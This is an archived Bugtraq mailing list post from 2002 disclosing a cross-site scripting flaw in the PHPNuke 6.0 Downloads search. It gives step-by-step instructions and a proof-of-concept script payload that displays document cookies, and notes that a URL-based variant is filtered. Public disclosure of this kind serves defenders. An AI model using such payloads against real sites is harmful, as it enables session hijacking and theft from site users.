Bugtraq mailing list archives
XSS bug in PHPNuke 6.0
From: Arab VieruZ <arabviersus () hotmail com>
Date: 10 Oct 2002 22:19:41 -0000
Vulnerable systems: PHPNuke 6.0 & mabey all Exploit: 1- go to http://[traget]/modules.php?name=Downloads&d_op=search 2- put in form search this code : <Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> 3- click "Search" (without "*") you can't use it an URL like this http://[traget]/modules.php? name=Downloads&d_op=search&query=<Scri*pt>javascript:alert(document.cookie) </Scri*pt> it will write "I don't like you..." me 2 :) ---------------------------------- Arab Vieruz thanx
Current thread:
- XSS bug in PHPNuke 6.0 Arab VieruZ (Oct 11)